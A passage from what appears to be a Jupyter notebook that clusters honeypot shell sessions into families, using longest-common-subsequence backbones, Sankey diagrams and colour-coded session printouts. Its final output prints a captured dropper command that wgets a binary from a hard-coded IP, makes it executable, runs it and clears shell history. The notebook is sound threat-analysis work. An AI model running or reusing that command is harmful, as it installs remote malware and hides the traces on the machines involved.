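                table[i][j] = 1 + table[i + 1][j + 1]
            else:
                table[i][j] = max(table[i + 1][j], table[i][j + 1])

    out, i, j = [], 0, 0
    while i < m and j < n:
        if a[i] == b[j]:
            out.append(a[i])
            i += 1
            j += 1
        elif table[i + 1][j] >= table[i][j + 1]:
            i += 1
        else:
            j += 1
    return out


def gap_variants(backbone, seq):
    """Collect tokens of `seq` that sit between backbone tokens, keyed by gap index.

    Gap k holds tokens seen after k backbone tokens have been matched,
    so k=0 is the stretch before the first backbone token.
    """
    gaps, k = {}, 0
    for tok in seq:
        if k < len(backbone) and tok == backbone[k]:
            k += 1
        else:
            gaps.setdefault(k, []).append(tok)
    return gaps


a = ["cat ;", "cd ||", "wget ;", "chmod ;", "PH_EXEC_1 ;"]
b = ["cat ;", "cd ||", "wget ;", "chmod ;", "sh ;"]

backbone = lcs(a, b)
print(backbone)
print(gap_variants(backbone, a))
print(gap_variants(backbone, b))
```

Both sequences share the same four-token backbone and differ only in the token that follows it, which is the kind of per-gap variation the Sankey branches are meant to show.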


In [10]:
# Sankey visualisation for a chosen FS family

import json
from pprint import pprint

FAM = 20

# 1) Pull family members' structured tokens
rows = family_members_df.loc[
    family_members_df["family_id"] == FAM,
    "struct_tokens",
]
if rows.empty:
    avail = sorted(family_members_df["family_id"].unique().tolist())
    raise ValueError(
        f"No members for family {FAM}. "
        f"Available family_ids (first 20): {avail[:20]}"
    )

family_seqs = [parse_structured_tokens(json.loads(s)) for s in rows]

# 2) Metadata for caption from summaries + archetypes
meta_row = summ_df.loc[summ_df["family_id"] == FAM].iloc[0]
medoid_idx = int(meta_row["medoid_idx"])
med = archetypes.iloc[medoid_idx]

caption = {
    "family_id": FAM,
    "n_sessions": len(family_seqs),
    "mean_FS": meta_row["mean_FS"],
    "sd_FS": meta_row["sd_FS"],
    "medoid_fi_hash": med["fi_hash"],
    "medoid_session": med["session"],
    "medoid_n_rows": int(med["n_rows"]),
    "top_ops": meta_row["top_ops"],
}

# 3) Build and show Sankey
fig, backbone, stats = sankey_from_family_enhanced(
    family_seqs,
    backbone=None,  # use WLCS backbone
    title=f"Family {FAM} — Sankey (WLCS backbone, structural FS)",
    min_variant_support=0.10,
    topN_variants_per_gap=3,
    variant_label_mode="first",
    normalise_widths=False,
    caption=caption,
)
fig.show()

print("Variant details by gap (k=0 is START→B0):")
pprint(stats["variant_detail"])


Variant details by gap (k=0 is START→B0):
{6: {'PH_EXEC_1 ;': 6, 'PH_EXEC_1 EOS': 1, 'sh ;': 1}}


## Step 9 - Inspect original sessions for a chosen FS family

FS families are defined over **FI-unique archetypes**, but each archetype
(`fi_hash`) can correspond to many original sessions. This cell lets us
“open up” one FS family and see all of its underlying sessions.

For a chosen `family_id` (`FAM`):

1. **Select FI classes in the family**  
   Use `archetypes["family_agg"]` to find all `fi_hash` values that belong
   to the chosen FS family.

2. **Expand back to original sessions**  
   Filter `fi_df` (one row per original session) to keep only those whose
   `fi_hash` is in that family. Detect a suitable commands column
   (`commands_clean`, `commands_joined`, or `commands`), and sort sessions
   by `fi_hash`, then `n_rows`, then `session`.

3. **Colour-map FI classes**  
   Build a stable mapping `fi_hash → colour` with `build_fi_colour_map`,
   and print a small legend showing how many sessions each FI class
   contributes.

4. **Pretty-print sessions grouped by FI class**  
   For each FI class in the family, print:
   - a group header (`FI class <fi_hash> — N sessions`), and  
   - each session’s `commands_clean`, colour-coded by `fi_hash`.

This makes it much easier to see, within a single FS family, which concrete
scripts belong to which FI-unique archetype, and how many times each
archetype appears in the raw data.
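
The expansion from a family back to its sessions, plus the colour-coding, can be sketched without pandas. The data, the palette, and the helper names below are hypothetical; only the 256-colour ANSI escape format (`ESC[38;5;<n>m ... ESC[0m`) is standard.

```python
from collections import Counter

# Hypothetical data: archetype -> family, and (session, fi_hash) pairs.
family_of = {"aaaa": 20, "bbbb": 20, "cccc": 7}
sessions = [("s1", "aaaa"), ("s2", "aaaa"), ("s3", "bbbb"), ("s4", "cccc")]


def sessions_in_family(fam, family_of, sessions):
    """Keep sessions whose fi_hash belongs to the chosen family."""
    wanted = {h for h, f in family_of.items() if f == fam}
    return [(sid, h) for sid, h in sessions if h in wanted]


def ansi_colour(text, code):
    """Wrap text in a 256-colour ANSI foreground escape sequence."""
    return f"\x1b[38;5;{code}m{text}\x1b[0m"


subset = sessions_in_family(20, family_of, sessions)
counts = Counter(h for _sid, h in subset)

# Give each FI class a fixed colour code so its lines are easy to spot.
palette = {h: 82 + 4 * i for i, h in enumerate(sorted(counts))}
for h in sorted(counts):
    print(ansi_colour(f"{h} (sessions={counts[h]})", palette[h]))
```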


In [11]:
# Inspect commands for all original sessions in a given FS family

FAM = 20

# 1) FI classes (fi_hash) that belong to this FS family
if "family_agg" not in archetypes.columns:
    raise KeyError(
        "Expected 'family_agg' column on archetypes. "
        "Run the clustering cell before this one."
    )

fam_fi_hashes = (
    archetypes.loc[archetypes["family_agg"] == FAM, "fi_hash"]
    .astype(str)
    .unique()
    .tolist()
)
if not fam_fi_hashes:
    raise ValueError(f"No FI classes found for family {FAM} in 'family_agg'.")

# 2) Expand back to all original sessions via fi_df
subset = fi_df[fi_df["fi_hash"].astype(str).isin(fam_fi_hashes)].copy()

cmd_col = next(
    (c for c in ["commands_clean", "commands_joined", "commands"] if c in subset.columns),
    None,
)
if cmd_col is None:
    raise KeyError(
        "No commands column found in fi_df. "
        "Looked for: commands_clean / commands_joined / commands."
    )

subset = (
    subset.assign(session=lambda df: df["session"].astype(str))
          .loc[:, ["session", "n_rows", "fi_hash", cmd_col]]
          .rename(columns={cmd_col: "commands_clean"})
          .sort_values(["fi_hash", "n_rows", "session"], ascending=[True, False, True])
          .reset_index(drop=True)
)

n_sessions = len(subset)
unique_fi = subset["fi_hash"].unique().tolist()
fi_counts = subset["fi_hash"].value_counts().sort_index()

print(f"Family {FAM}: {n_sessions} original sessions")
print(f"Distinct FI classes in this family: {len(unique_fi)}")

# 3) Colour map and legend
fi_to_colour = build_fi_colour_map(unique_fi, seed=1)

print("\nFI-class legend (colour-coded):")
for fh in sorted(unique_fi):
    label = f"{fh} (sessions={fi_counts[fh]})"
    print("  ", colour_text(label, fh, fi_to_colour))

# 4) Detailed per-session printout
print("\n=== Per-session commands_clean (grouped by fi_hash) ===")
current_fi = None

for _, row in subset.iterrows():
    fh = row["fi_hash"]
    if fh != current_fi:
        current_fi = fh
        header = f"\n### FI class {fh} — {fi_counts[fh]} sessions"
        print(colour_text(header, fh, fi_to_colour))

    hdr = f"--- session {row['session']} | n_rows={row['n_rows']} | fi_hash={fh} ---"
    print(colour_text(hdr, fh, fi_to_colour))

    cmds = str(row["commands_clean"])
    pretty = cmds if "\n" in cmds else cmds.replace(" ; ", ";\n")
    print(colour_text(pretty, fh, fi_to_colour))


Family 20: 87 original sessions
Distinct FI classes in this family: 8

FI-class legend (colour-coded):
   2b5150c23e9a475b (sessions=8)
   5132f82d03311d29 (sessions=35)
   69389df6348c3521 (sessions=8)
   69765b4232307f30 (sessions=9)
   7879301414703b7b (sessions=18)
   79bed62d9fd307a5 (sessions=2)
   980934c326711042 (sessions=3)
   a74c1abec6f558ea (sessions=4)

=== Per-session commands_clean (grouped by fi_hash) ===

### FI class 2b5150c23e9a475b — 8 sessions
--- session 47d4dcea00e5 | n_rows=1 | fi_hash=2b5150c23e9a475b ---
cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://46.19.141.122/bins/x86; cat x86 > snort; chmod 777 snort; chmod +x snort; ./snort rooted.x86; history -c
--- session 5455882fc087 | n_rows=1 | fi_hash=2b5150c23e9a475b ---
cat /etc/issue; cd /tm